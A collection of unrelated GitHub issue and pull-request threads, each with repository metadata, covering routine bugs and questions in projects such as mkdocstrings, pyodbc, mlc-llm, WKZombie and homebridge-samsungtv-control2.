2025-04-01T06:39:38.670083
2018-03-09T12:28:03
303825397
{ "authors": [ "jpic" ], "license": "bsd-3-clause", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8621", "repo": "mjtamlyn/django-adapters", "url": "https://github.com/mjtamlyn/django-adapters/issues/39" }
gharchive/issue
Question about the adapters pattern

Considering my current understanding of the adapters pattern - waiting to stand corrected - we're going to define adapter mapping trees. Will it exclusively go one way, i.e.:

```python
from django.db.models import Person

# add returns a clone of the payload, so we're instantiating 2 payloads here
# because the FormView adapter's post_add() will add(Form adapter, clone=False)
# if it's not already there ?
p = Payload.factory(instance=Person()).add('django.views.ModelFormView')

# executing a step returns a clone of the payload, but we don't care:
# we have an adapter mapping on data, a request, and we want a response
assert p.steps.response(request=request).response
```

The tutorial demonstrates how the above would be possible, but it might look like this (not tested code, obviously clumsy):

- import the Person model
- make a payload with an empty instance; because it's a model, factory will add the django model adapter, which has post_add(): introspect the payload, map payload.instance._meta.fields to keys of the Payload corresponding to field names, with the appropriate adapters for each field, i.e. payload.map.name.adapters == [StringAdapter(max_length=255)], and add validate and clean steps
- add the modelformview adapter on the person payload
- add the form adapter on the person payload, introspect the payload, and map keys corresponding to form fields to model fields, i.e. payload.map.name.adapters == [StringAdapter(max_length=255), TextFieldAdapter(label="my verbose name")], add validate and clean steps on the person payload, and add a render step
- add the template adapter on the person, which adds a render step with a default template name that will be able to see other adapters' render outputs
- add a response step to orchestrate the other steps; it needs payload.request, and sets payload.response in a clone, as usual when a step is executed, unless clone=False, for calling steps from within steps
- execute the response step by adding the request to the payload
- the modelformview adapter's response will try to execute all prior steps; if no errors are added by the clean() step, then the process() step will save; if there are errors on the validate step, response() will show the form again, otherwise redirect to the detail view; if errors were added during process, who knows - and honestly I leave it up to you what the default behaviour will be, since it should be so easy to override not only the method but the default adapter registered for ModelFormView !!

Or, will it allow building a nested adapter map, and then being able to generate a model class with another adapter?

```python
class Hobby(adapters.Payload):
    name = Payload(adapters=[StringAdapter()])

class Person(adapters.Payload):
    hobbies = Payload(map=[HobbyAdapter()])

    class Meta:
        adapters = [OnlyAllowHobbiesToBe('archery', 'django', 'music')]

p = Person().add('django.db.models.Model')

# custom step by django model adapter, optional, sets payload.model if not already present
p.steps.modelize().model
```

Another possibility is to make everything an adapter, which can have adapters who know about their parent, in which case steps are also adapters; they just orchestrate the adapters which are in a mapping structure, and defining a step is just defining a method which may depend on methods executed before it.

Sorry if this doesn't make any sense, please correct me ;) If it makes sense to you, then you probably understand why I consider this worth a million $, in terms of refactoring and code reusability.

Closing this for now, it's not supported
2025-04-01T06:39:38.678783
2020-08-13T13:01:56
678419423
{ "authors": [ "AppVeyorBot", "KvanTTT" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8622", "repo": "mkaring/ConfuserEx", "url": "https://github.com/mkaring/ConfuserEx/pull/189" }
gharchive/pull-request
Refactor duplicated code in tests, remove duplicated references from test projects

Fix #158, merge after #188

:x: Build ConfuserEx 407 failed (commit https://github.com/mkaring/ConfuserEx/commit/59830d5eb4 by @KvanTTT)
:x: Build ConfuserEx 409 failed (commit https://github.com/mkaring/ConfuserEx/commit/4a8592482f by @KvanTTT)
:x: Build ConfuserEx 410 failed (commit https://github.com/mkaring/ConfuserEx/commit/93caef267e by @KvanTTT)
:x: Build ConfuserEx 411 failed (commit https://github.com/mkaring/ConfuserEx/commit/48f4be13a2 by @KvanTTT)
2025-04-01T06:39:38.720164
2024-01-24T15:13:47
2098490953
{ "authors": [ "cldtech", "pawamoy" ], "license": "ISC", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8623", "repo": "mkdocstrings/mkdocstrings", "url": "https://github.com/mkdocstrings/mkdocstrings/issues/648" }
gharchive/issue
bug: ModuleNotFoundError: No module named 'mkdocstrings_handlers'

Description of the bug

When I try to build the docs I get "ModuleNotFoundError: No module named 'mkdocstrings_handlers'". This is a fresh installation and a new, empty mkdocs project, and I still get this error as soon as I add a class or a function.

To Reproduce

```
pip3 install mkdocs
pip3 install mkdocstrings
mkdocs new docs
cd docs
mkdocs build
```

Full traceback

```
INFO    -  Cleaning site directory
INFO    -  Building documentation to directory: /home/sam/Documents/project/project/has/docs/site
WARNING -  A relative path to 'subfolder/functions.md' is included in the 'nav' configuration, which is not found in the documentation files.
WARNING -  A relative path to 'functions.md' is included in the 'nav' configuration, which is not found in the documentation files.
ERROR   -  Error reading page 'index.md': No module named 'mkdocstrings_handlers'
Traceback (most recent call last):
  File "/home/sam/.local/bin/mkdocs", line 8, in <module>
    sys.exit(cli())
  File "/home/sam/.local/lib/python3.9/site-packages/click/core.py", line 1157, in __call__
    return self.main(*args, **kwargs)
  File "/home/sam/.local/lib/python3.9/site-packages/click/core.py", line 1078, in main
    rv = self.invoke(ctx)
  File "/home/sam/.local/lib/python3.9/site-packages/click/core.py", line 1688, in invoke
    return _process_result(sub_ctx.command.invoke(sub_ctx))
  File "/home/sam/.local/lib/python3.9/site-packages/click/core.py", line 1434, in invoke
    return ctx.invoke(self.callback, **ctx.params)
  File "/home/sam/.local/lib/python3.9/site-packages/click/core.py", line 783, in invoke
    return __callback(*args, **kwargs)
  File "/home/sam/.local/lib/python3.9/site-packages/mkdocs/__main__.py", line 286, in build_command
    build.build(cfg, dirty=not clean)
  File "/home/sam/.local/lib/python3.9/site-packages/mkdocs/commands/build.py", line 322, in build
    _populate_page(file.page, config, files, dirty)
  File "/home/sam/.local/lib/python3.9/site-packages/mkdocs/commands/build.py", line 175, in _populate_page
    page.render(config, files)
  File "/home/sam/.local/lib/python3.9/site-packages/mkdocs/structure/pages.py", line 271, in render
    self.content = md.convert(self.markdown)
  File "/home/sam/.local/lib/python3.9/site-packages/markdown/core.py", line 357, in convert
    root = self.parser.parseDocument(self.lines).getroot()
  File "/home/sam/.local/lib/python3.9/site-packages/markdown/blockparser.py", line 117, in parseDocument
    self.parseChunk(self.root, '\n'.join(lines))
  File "/home/sam/.local/lib/python3.9/site-packages/markdown/blockparser.py", line 136, in parseChunk
    self.parseBlocks(parent, text.split('\n\n'))
  File "/home/sam/.local/lib/python3.9/site-packages/markdown/blockparser.py", line 158, in parseBlocks
    if processor.run(parent, blocks) is not False:
  File "/home/sam/.local/lib/python3.9/site-packages/mkdocstrings/extension.py", line 124, in run
    html, handler, data = self._process_block(identifier, block, heading_level)
  File "/home/sam/.local/lib/python3.9/site-packages/mkdocstrings/extension.py", line 195, in _process_block
    handler = self._handlers.get_handler(handler_name, handler_config)
  File "/home/sam/.local/lib/python3.9/site-packages/mkdocstrings/handlers/base.py", line 459, in get_handler
    module = importlib.import_module(f"mkdocstrings_handlers.{name}")
  File "/usr/lib/python3.9/importlib/__init__.py", line 127, in import_module
    return _bootstrap._gcd_import(name[level:], package, level)
  File "<frozen importlib._bootstrap>", line 1030, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1007, in _find_and_load
  File "<frozen importlib._bootstrap>", line 972, in _find_and_load_unlocked
  File "<frozen importlib._bootstrap>", line 228, in _call_with_frames_removed
  File "<frozen importlib._bootstrap>", line 1030, in _gcd_import
  File "<frozen importlib._bootstrap>", line 1007, in _find_and_load
  File "<frozen importlib._bootstrap>", line 984, in _find_and_load_unlocked
ModuleNotFoundError: No module named 'mkdocstrings_handlers'
```

Expected behavior

Since I put a class in index.md, I expect the site to be generated correctly.

Environment information

```
python3 -m mkdocstrings.debug  # | xclip -selection clipboard

System: Linux-5.10.0-26-amd64-x86_64-with-glibc2.31
Python: cpython 3.9.2
Environment variables:
  PYTHONPATH: :/home/sam/Documents/Project/project
Installed packages:
  mkdocstrings v0.24.0
```

Additional context

Duplicate of #623, #647

You mean I have to install mkdocstrings-python with pip?

Yes :)
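For later readers: the fix in this thread (installing the separate mkdocstrings-python handler package) can be sanity-checked by mirroring the import that mkdocstrings performs internally, as seen in the traceback above. A minimal sketch:

```python
# Sketch: reproduce the import mkdocstrings does in handlers/base.py to
# verify the handler package is installed in the same environment that
# runs mkdocs. The Python handler ships separately as `mkdocstrings-python`.
import importlib

try:
    importlib.import_module("mkdocstrings_handlers.python")
    print("python handler found")
except ModuleNotFoundError:
    print("missing; install it with: pip install mkdocstrings-python")
```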
2025-04-01T06:39:38.725417
2017-08-18T21:37:36
251364946
{ "authors": [ "kenanbalija", "mkhazov", "tunmsk" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8624", "repo": "mkhazov/videojs-share", "url": "https://github.com/mkhazov/videojs-share/issues/2" }
gharchive/issue
share buttons not working

Hello, thank you for your great work and for sharing it. I installed your plugin on my website. Copying the link and the embed code work perfectly, but not the social buttons: I tried them all. Here's a URL to check: https://videos.arabeevideo.com/watch/p127-royal-enfield-cont

Is it possible to add custom embed code?

You can pass custom embed code as the embedCode property in the plugin options object.

Would you be kind and provide an example of a share button implementation (fb or smth)? 😸

Take a look at https://neuron-digital.github.io/wjplayer/examples/mp4.html

I'm not very comfortable with JS programming, nor with videojs, but this seems to be a customized player with many advanced features. I took a look into the source code; it seems you packed plugins together. Is it possible to add other plugins, like playlist or context menu, to your player?

@tunmsk videojs has that already. He improved it with his own plugin. Check https://github.com/videojs/video.js
2025-04-01T06:39:38.738774
2019-06-28T20:52:24
462203336
{ "authors": [ "dvarna", "gordthompson" ], "license": "MIT-0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8625", "repo": "mkleehammer/pyodbc", "url": "https://github.com/mkleehammer/pyodbc/issues/579" }
gharchive/issue
Insert result set resulting in "pyodbc.ProgrammingError: ('String data, right truncation: length 8 buffer 4', 'HY000')" error.

I am using pyodbc version 4.0.26. Inserting a result set (containing a decimal result) with fast_executemany set to True results in a "pyodbc.ProgrammingError: ('String data, right truncation: length 8 buffer 4', 'HY000')" error.

Please provide a minimum reproducible example and/or an ODBC trace, along with the name and version of the ODBC driver you are using.

SQL.LOG

Hi, I have attached the ODBC trace. Below are the versions of the software I am using:

- Python version: 3.7
- pyodbc version: 4.0.26
- DB: Teradata
- Driver: Teradata <IP_ADDRESS>
- OS: Win10

The previous version of the issue title indicates that you are using fast_executemany. Does the error go away if you use fast_executemany=False (the default)? If so, then the Teradata ODBC driver may simply not support "parameter arrays", the internal ODBC feature that allows fast_executemany=True to work.

Yes. It works when fast_executemany=False. I have used fast_executemany=True on the same Teradata driver for other tables. It worked. I am having an issue for this one table. Could it be an issue in the data I am inserting? The data I am inserting is extracted from a VSAM file (Mainframe).

The error pyodbc.ProgrammingError: ('String data, right truncation: length 8 buffer 4', 'HY000') clearly indicates that a string parameter value is overflowing the space allocated to it. Are you passing the decimal parameter values as strings? If so, can you try passing those parameter values as Decimal instead of str, e.g., Decimal('3.14') instead of '3.14'?

Yes. I am passing decimal parameter values as strings. I passed those values as Decimal. It worked. Thanks so much for your inputs.

You're welcome. Glad to hear that you got it working. You can close this issue now.
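To make the resolution concrete, here is a minimal sketch of the working pattern, passing decimal.Decimal parameters instead of strings with fast_executemany enabled; the DSN, table and column names are hypothetical:

```python
import decimal
import pyodbc

# Hypothetical DSN and table; the point is the parameter types.
cnxn = pyodbc.connect("DSN=TeradataDSN")
cursor = cnxn.cursor()
cursor.fast_executemany = True  # uses ODBC parameter arrays internally

rows = [
    ("alpha", decimal.Decimal("3.14")),  # Decimal, not the string '3.14'
    ("beta", decimal.Decimal("2.72")),
]
cursor.executemany("INSERT INTO my_table (name, amount) VALUES (?, ?)", rows)
cnxn.commit()
```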
2025-04-01T06:39:38.742322
2017-06-25T22:16:21
238410570
{ "authors": [ "billylo1", "mkoehnke" ], "license": "mit", "license_source": "bigquery", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8626", "repo": "mkoehnke/WKZombie", "url": "https://github.com/mkoehnke/WKZombie/issues/65" }
gharchive/issue
open method not visible when using WKZombie in Objective-C project

Hi, after adding WKZombie to my Podfile and adding @import WKZombie;, I can invoke some methods on WKZombie.sharedInstance, e.g. dump, setTimeoutSeconds, but the essential open method is not visible for some reason. Would you have any hints on how to solve this? Thanks.

Hi @billylo1, thanks for reporting this. You're right, there seems to be an issue with the extensions not being visible in Objective-C code. I'll look into it.

Thanks! Looking forward to it!

Sorry for the confusion! I forgot that Swift generic functions are not supported by Objective-C. So this is the correct behaviour. However, you should be able to add a Swift file to your Objective-C project (Mix and Match) and use WKZombie in there. Hope that helps!

I did try that, importing the WKZombie-Swift.h to make WKZombie visible to the Objective-C code. But I can't find a way to invoke "open". Are you able to make it work in Xcode?

Just add a Swift file (e.g. Test.swift) to your project and simply add "import WKZombie". Create a class/function, do all the headless browsing there and hand the result back to your Objective-C code.
2025-04-01T06:39:38.753828
2024-07-24T20:01:11
2428372889
{ "authors": [ "albertodvp" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8627", "repo": "mlabs-haskell/cardanow", "url": "https://github.com/mlabs-haskell/cardanow/pull/80" }
gharchive/pull-request
Refactor cardano-db-sync code and add tests

Closes #67

~Note: this PR breaks the cardanow-ts nix package: in particular, the checkPhase is no longer passing: it seems the mocking is not working as expected~

How is the derivation build not failing if tests are failing? I don't see where you disabled them, and if I run nix build locally I see that some tests are executed.

The first draft had that, but I managed to fix it, so we are currently testing things in CI, good catch.

Probably not the end of the world, since we are talking about tests anyway, but is the as unknown as Mock thing unavoidable? Or perhaps it's something commonly done in TypeScript? (forgive my ignorance)

Not sure honestly, I'm not a TS expert either; I'll drop a todo commit so we can look into this better later.

The idea is that we start docker during the tests because we need a database? I can't understand how it's mocked otherwise. Perhaps this is why the derivation check phase fails? (running docker in a derivation sandbox may be non-trivial)

No we are not, we are only mocking the TS code, docker is not involved.
2025-04-01T06:39:38.783079
2024-01-03T14:38:43
2064147211
{ "authors": [ "CharlieFRuan", "alphaarea", "junrushao" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8628", "repo": "mlc-ai/mlc-llm", "url": "https://github.com/mlc-ai/mlc-llm/issues/1533" }
gharchive/issue
[Bug] Unable to recognize vocab.json, merges.txt tokenizer format

🐛 Bug

According to #31, mlc-llm should already support the vocab.json, merges.txt tokenizer format. But when I try to run inference with CausalLM/72B-preview-llamafied-qwen-llamafy, I run into an error saying that the tokenizer can't be found:

```
>>> from mlc_chat import ChatModule
>>> cm = ChatModule(model="/home/alphaarea/models/CausalLM-7B-DPO-alpha-q0f16", model_lib_path="/home/alphaarea/models/CausalLM-7B-DPO-alpha-q0f16/CausalLM-7B-DPO-alpha-q0f16-cuda.so")
[2024-01-03 14:04:58] INFO model_metadata.py:55: Total memory usage: 9917.13 MB (Parameters: 5462.51 MB. KVCache: 1024.00 MB. Temporary buffer: 3430.62 MB)
[2024-01-03 14:04:58] INFO model_metadata.py:64: To reduce memory usage, tweak `prefill_chunk_size`, `context_window_size` and `sliding_window_size`
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/home/alphaarea/.conda/envs/mlc-llm-20240103/lib/python3.11/site-packages/mlc_chat/chat_module.py", line 774, in __init__
    self._reload(self.model_lib_path, self.model_path, user_chat_config_json_str)
  File "/home/alphaarea/.conda/envs/mlc-llm-20240103/lib/python3.11/site-packages/mlc_chat/chat_module.py", line 988, in _reload
    self._reload_func(lib, model_path, app_config_json)
  File "tvm/_ffi/_cython/./packed_func.pxi", line 332, in tvm._ffi._cy3.core.PackedFuncBase.__call__
  File "tvm/_ffi/_cython/./packed_func.pxi", line 263, in tvm._ffi._cy3.core.FuncCall
  File "tvm/_ffi/_cython/./packed_func.pxi", line 252, in tvm._ffi._cy3.core.FuncCall3
  File "tvm/_ffi/_cython/./base.pxi", line 182, in tvm._ffi._cy3.core.CHECK_CALL
  File "/home/alphaarea/.conda/envs/mlc-llm-20240103/lib/python3.11/site-packages/tvm/_ffi/base.py", line 481, in raise_last_ffi_error
    raise py_err
  File "/workspace/mlc-llm/cpp/llm_chat.cc", line 1532, in mlc::llm::LLMChatModule::GetFunction(tvm::runtime::String const&, tvm::runtime::ObjectPtr<tvm::runtime::Object> const&)::{lambda(tvm::runtime::TVMArgs, tvm::runtime::TVMRetValue*)#1}::operator()(tvm::runtime::TVMArgs, tvm::runtime::TVMRetValue*) const
  File "/workspace/mlc-llm/cpp/llm_chat.cc", line 553, in mlc::llm::LLMChat::Reload(tvm::runtime::TVMArgValue, tvm::runtime::String, tvm::runtime::String)
  File "/workspace/mlc-llm/cpp/tokenizers.cc", line 63, in mlc::llm::TokenizerFromPath(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)
tvm._ffi.base.TVMError: Traceback (most recent call last):
  3: mlc::llm::LLMChatModule::GetFunction(tvm::runtime::String const&, tvm::runtime::ObjectPtr<tvm::runtime::Object> const&)::{lambda(tvm::runtime::TVMArgs, tvm::runtime::TVMRetValue*)#1}::operator()(tvm::runtime::TVMArgs, tvm::runtime::TVMRetValue*) const
        at /workspace/mlc-llm/cpp/llm_chat.cc:1532
  2: mlc::llm::LLMChat::Reload(tvm::runtime::TVMArgValue, tvm::runtime::String, tvm::runtime::String)
        at /workspace/mlc-llm/cpp/llm_chat.cc:553
  1: mlc::llm::TokenizerFromPath(std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > const&)
        at /workspace/mlc-llm/cpp/tokenizers.cc:63
  0: _ZN3tvm7runtime6deta
  File "/workspace/mlc-llm/cpp/tokenizers.cc", line 63
TVMError: Cannot find any tokenizer under: /home/alphaarea/models/CausalLM-7B-DPO-alpha-q0f16
```

Here is the mlc-chat-config.json generated by mlc_chat gen_config, which looks like it already recognizes the tokenizer files. But it doesn't work in practice:

```json
{
  ...
  "tokenizer_files": [
    "vocab.json",
    "merges.txt",
    "tokenizer_config.json"
  ],
  "version": "0.1.0"
}
```

To Reproduce

Several of CausalLM's models use the same tokenizer format, which can be reproduced by downloading the smallest model, CausalLM/7B-DPO-alpha.

convert, gen_config and compile:

```
MODEL_PATH='/home/alphaarea/models/CausalLM-7B-DPO-alpha'
MLC_QUANT='q0f16'
MLC_DEV='cuda'
MLC_SHARDS=4
MODEL_ARCH='llama'
MODEL_TEMP='gpt2'
MODEL_NAME=${MODEL_PATH##*/}
MODEL_OUTPUT=$MODEL_PATH'-'$MLC_QUANT
MODEL_LIB=$MODEL_NAME'-'$MLC_QUANT'-'$MLC_DEV'.so'
mlc_chat convert_weight --quantization $MLC_QUANT --model-type $MODEL_ARCH --output $MODEL_OUTPUT $MODEL_PATH
mlc_chat gen_config --quantization $MLC_QUANT --model-type $MODEL_ARCH --conv-template $MODEL_TEMP --tensor-parallel-shards $MLC_SHARDS --output $MODEL_OUTPUT $MODEL_PATH
mlc_chat compile --device $MLC_DEV --output $MODEL_OUTPUT/$MODEL_LIB $MODEL_OUTPUT/mlc-chat-config.json
```

run in python:

```python
from mlc_chat import ChatModule
cm = ChatModule(model="/yourpath/CausalLM-7B-DPO-alpha-q0f16", model_lib_path="/yourpath/CausalLM-7B-DPO-alpha-q0f16/CausalLM-7B-DPO-alpha-q0f16-cuda.so")
```

Expected behavior

```
TVMError: Cannot find any tokenizer under: /yourpath/CausalLM-7B-DPO-alpha-q0f16
```

Environment

- Platform: CUDA
- Operating system: Ubuntu 22.04.3 LTS
- Device: Tesla P100
- How you installed MLC-LLM: python3 -m pip install --pre -U -f https://mlc.ai/wheels mlc-chat-nightly-cu121 mlc-ai-nightly-cu121
- How you installed TVM-Unity: pip
- Python version: 3.11
- GPU driver version: 545.23.08
- CUDA/cuDNN version: 12.1

Currently we support the following tokenizers:

- SentencePiece
- HuggingFace
- RWKV world
- Byte-level BPE

See the tokenizer-finding logic here for more details: https://github.com/mlc-ai/mlc-llm/blob/main/cpp/tokenizers.cc. The tokenizer-related files that exist (vocab.json, merges.txt and tokenizer_config.json) don't match any of the patterns in our tokenizer detection, and that's why an error is reported. Not super familiar with the tokenizer part, could you share which tokenizer it is? Please feel free to contribute if you are interested!

I've figured it out: the models I've been able to run without problems in the past have the tokenizer_class LlamaTokenizer or LlamaTokenizerFast in tokenizer_config.json, but CausalLM-72B uses GPT2Tokenizer. And I had a similar problem when trying Nous-Capybara-34B, whose tokenizer_class is YiTokenizer. Does "HuggingFace tokenizers" support currently mean only LlamaTokenizer and LlamaTokenizerFast? In the future, will the common tokenizers supported by transformers.AutoTokenizer be more easily supported by mlc-llm?

I do think we fundamentally support the full HuggingFace tokenizers, because we compile its full source in Rust: https://github.com/mlc-ai/tokenizers-cpp with some wrapping logic:

- Rust wrapper: https://github.com/mlc-ai/tokenizers-cpp/blob/main/rust/src/lib.rs#L106-L130
- Expose Rust wrapper in C++: https://github.com/mlc-ai/tokenizers-cpp/blob/main/src/huggingface_tokenizer.cc#L84

It would be awesome if you'd love to contribute by adding the related wrappers to tokenizers-cpp!

Ah, I just noticed that GPT2Tokenizer is actually a byte-level BPE tokenizer, which is supported already. We only need to figure out what the missing file added_tokens.json is used for.

I saw a blog explaining this file. Let me know if it's helpful! https://blog.rfox.eu/en/Programming/How_to_run_your_own_LLM_GPT.html

I'll see if there's a way of generating an added_tokens.json during gen_config, just like how we currently convert tokenizer.model to tokenizer.json there: https://github.com/mlc-ai/mlc-llm/blob/main/python/mlc_chat/interface/gen_config.py#L132-L153. Meanwhile we might have to do it manually.

@CharlieFRuan I tried to add an added_tokens.json with an empty JSON string "{}", but got another error from our tokenizer wrapper complaining about merges.txt:

```
thread '<unnamed>' panicked at 'Invalid merges.txt file.', src/lib.rs:63:21
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace
fatal runtime error: failed to initiate panic, error 5
```

This line in our tokenizer wrapper tries to split each line in merges.txt into two pieces, separated by " ", which fails at the last line, which only contains: å

Note that the merges.txt file is different from GPT2's official one.

OK, I know how to make this work now! @alphaarea There are two things you will want to patch up:

- Add an added_tokens.json which contains an empty JSON object: "{}"
- Replace the truncated merges.txt with Qwen's official one.

Many thanks, I successfully ran CausalLM/7B-DPO-alpha following your way. English and Chinese both run well. And I compared the merges.txt from CausalLM/7B-DPO-alpha and vonjack/Qwen-LLaMAfied-HFTok-7B-Chat. The front half of them is exactly the same, but CausalLM/7B-DPO-alpha's merges.txt is shorter and looks like it has an incomplete ending: the last line only has one character, å. I deleted that line and tried to run it, and can't believe it worked well. It seems no different from using the merges.txt from vonjack/Qwen-LLaMAfied-HFTok-7B-Chat. Is this due to an error in the file provided by CausalLM itself?

When I used the same approach on CausalLM/72B-preview-llamafied-qwen-llamafy, it didn't have the same effect. It output broken characters; it looks like the tokenizer still has an error. So I ran the test all over again and noticed a warning when starting convert_weight:

```
[2024-01-06 11:57:23] WARNING utils.py:25: Unused extern parameters: model.layers.0.self_attn.k_proj.bias, model.layers.0.self_attn.o_proj.bias, model.layers.0.self_attn.q_proj.bias, model.layers.0.self_attn.v_proj.bias, model.layers.1.self_attn.k_proj.bias... (Incomplete, the warning is very long)
```

Is this the reason why the model outputs broken characters? Other than that, I haven't encountered any other warning messages. CausalLM is not a popular model; I'm not sure if there's something wrong with the model itself. If the maintainers determine that these errors are caused by CausalLM's non-standard llama model itself, please close the issue.
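The two manual patches described in this thread can be scripted. A minimal sketch, with hypothetical paths (the replacement merges.txt has to be obtained from Qwen's official repository separately):

```python
# Sketch of the manual workaround from this thread:
# 1. add an added_tokens.json containing an empty JSON object, and
# 2. replace the truncated merges.txt with Qwen's official one.
import pathlib
import shutil

model_dir = pathlib.Path("/yourpath/CausalLM-7B-DPO-alpha-q0f16")  # hypothetical
(model_dir / "added_tokens.json").write_text("{}")

official_merges = pathlib.Path("/yourpath/qwen-official/merges.txt")  # hypothetical
shutil.copy(official_merges, model_dir / "merges.txt")
```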
2025-04-01T06:39:38.787753
2023-08-09T05:43:15
1842528965
{ "authors": [ "Cydia2018", "Hzfengsy", "MasterJH5574" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8629", "repo": "mlc-ai/mlc-llm", "url": "https://github.com/mlc-ai/mlc-llm/issues/710" }
gharchive/issue
[Bug] Unsupported gpu architecture 'compute_89'

🐛 Bug

I got this error while building the model:

```
nvcc fatal : Unsupported gpu architecture 'compute_89'
```

I didn't encounter it before. After I commented out https://github.com/mlc-ai/mlc-llm/pull/686, the error was resolved.

What's your CUDA version? I guess we are trying to build sm89 while your local nvcc does not support it. We should not enable fatbin by default cc @MasterJH5574

The problem should be solved if you upgrade to CUDA 11.8. Meanwhile, we will fix it and turn it off by default.

Thanks @Cydia2018 for reporting! With #716 we will be good to go.

#716 got merged. Please open an issue again if the issue persists :-)
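As a quick local check, nvcc can report which architectures it supports; 'compute_89' (Ada) only appears on CUDA 11.8 and newer. A small sketch:

```python
# Sketch: list the GPU architectures the local nvcc supports.
# 'compute_89' only shows up with CUDA 11.8+.
import subprocess

result = subprocess.run(
    ["nvcc", "--list-gpu-arch"], capture_output=True, text=True, check=True
)
print(result.stdout)
```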
2025-04-01T06:39:38.841109
2023-05-08T08:59:32
1699840927
{ "authors": [ "mmalecot", "petru-tazz" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8630", "repo": "mmalecot/file-format", "url": "https://github.com/mmalecot/file-format/issues/22" }
gharchive/issue
Detect SVG when XML declaration is missing

Hello, I'm currently working on a project that relies heavily on file-format to handle images by their media type accordingly. I've just finished the implementation of SVG support in our app and, while testing, the crate failed to detect that our logo is an SVG. The main reason is that it lacks the <?xml declaration, so the code never reaches this part. After looking at our (source) SVGs, I found that there are many cases:

- some of them contain the <?xml declaration;
- some of them contain the xmlns attribute on <svg>;

The key point of this issue is that, as per this doc, <?xml is optional unless the encoding is not UTF-8 or UTF-16. While I made a patch for our needs (and am willing to finish up the PR), I wanted to open this issue to talk about other SVG versions and how this can be treated better for wider / more general use.

Hello, thanks for your PR! Indeed, some XML-based formats such as SVG may not be detected. After some research, it turns out that XML 1.0 has an optional declaration, whereas with XML 1.1 it is mandatory. Ideally, I will have to deal with all XML-based formats when they do not have an XML declaration. I will comment directly on your PR for SVG.

Hi, the patch will be available in version 0.17 later this week.

Hi, I'm a bit late because I also wanted to resolve #21 for version 0.17. I'm going to do a bit of code review; the release should arrive very soon!

Version 0.17.0 published, including this fix! Thanks!
2025-04-01T06:39:38.867708
2020-07-29T07:01:09
667603139
{ "authors": [ "ggroel", "mmende", "simoneras" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8631", "repo": "mmende/homebridge-samsungtv-control2", "url": "https://github.com/mmende/homebridge-samsungtv-control2/issues/12" }
gharchive/issue
samsung UE40F6400 volume control

Hi everyone, how do I turn on volume control? Thank you.

Volume is implemented but doesn't show up at the moment. It does show up in the homebridge accessories tab for me, however. I still have to figure out why iOS isn't showing the speaker service.

Hi, I also see it as an accessory in Homebridge, but not on iOS. Thank you.

I have the theory that iOS requires some other characteristics like CurrentMediaState before it will show the volume characteristics. Unfortunately, I didn't find any more documentation concerning this topic in the homebridge docs or Apple's HomeKit documentation yet.

I just figured out that I can control the volume with the iPhone hardware buttons when in control center -> remote -> TV selected on top... I still don't know how to toggle mute in the remote app, however. The source for this info also says that the Home app just doesn't show the TV speaker accessory like other apps do. I might add an option to add a "lightbulb" accessory or so, to be able to control the volume/mute directly in the Home app like other plugins do.

The native accessory of Apple TV 4 has volume control... maybe you can investigate on that side... Gastón

Maybe it will help: https://developer.apple.com/documentation/mediaplayer/mpvolumeview Gastón

In node-red, with the linked service "TelevisionSpeaker" and Characteristic { "VolumeControlType": 1, "VolumeSelector": true }, I see it in the control center, with output {"RemoteKey":4} UP; {"RemoteKey":5} DOWN; {"RemoteKey":7} DX; {"RemoteKey":6} SX. IF YOU CAN USE IT

now works!!!

Nice... A more fine-grained volume control is not accessible in iOS yet, unfortunately. However, it is implemented theoretically in this plugin. I hope iOS 14 will bring volume controls for TVs.
2025-04-01T06:39:38.879336
2021-10-21T12:31:40
1032438137
{ "authors": [ "codecov-commenter", "mmiranda" ], "license": "MIT", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8632", "repo": "mmiranda/markdown-index", "url": "https://github.com/mmiranda/markdown-index/pull/3" }
gharchive/pull-request
Goreleaser with Homebrew

Adding a .goreleaser.yml setup to use Homebrew.

Codecov Report

Merging #3 (b8a35cb) into main (c383555) will not change coverage. The diff coverage is n/a.

```
@@           Coverage Diff           @@
##             main       #3   +/-   ##
=======================================
  Coverage   86.11%   86.11%
=======================================
  Files           1        1
  Lines         108      108
=======================================
  Hits           93       93
  Misses          9        9
  Partials        6        6
```

Continue to review full report at Codecov.

Legend - Click here to learn more
Δ = absolute <relative> (impact), ø = not affected, ? = missing data
Powered by Codecov. Last update c383555...b8a35cb. Read the comment docs.
2025-04-01T06:39:38.897151
2024-02-04T06:58:39
2116916176
{ "authors": [ "fireflycons", "pugazhendhiramakrishnan08121985" ], "license": "Apache-2.0", "license_source": "github-api", "license_type": "permissive", "provenance": "gharchive-dolma-0000.json.gz:8633", "repo": "mmumshad/kubernetes-the-hard-way", "url": "https://github.com/mmumshad/kubernetes-the-hard-way/issues/330" }
gharchive/issue
Lecture Request: Separate course or module for installing a Kubernetes cluster

Your Workstation

Windows 10 Laptop, 16 GB RAM, 8-core i7 CPU

What happened?

Would like to see a course on Kubernetes installation in various scenarios: bare metal, cloud, virtualization, single master, multi-master, managing multiple clusters, etc.

Relevant log output

No response

Hello, please see the following:

https://github.com/kodekloudhub/certified-kubernetes-administrator-course/tree/master/kubeadm-clusters
https://github.com/kodekloudhub/certified-kubernetes-administrator-course/tree/master/managed-clusters/eks

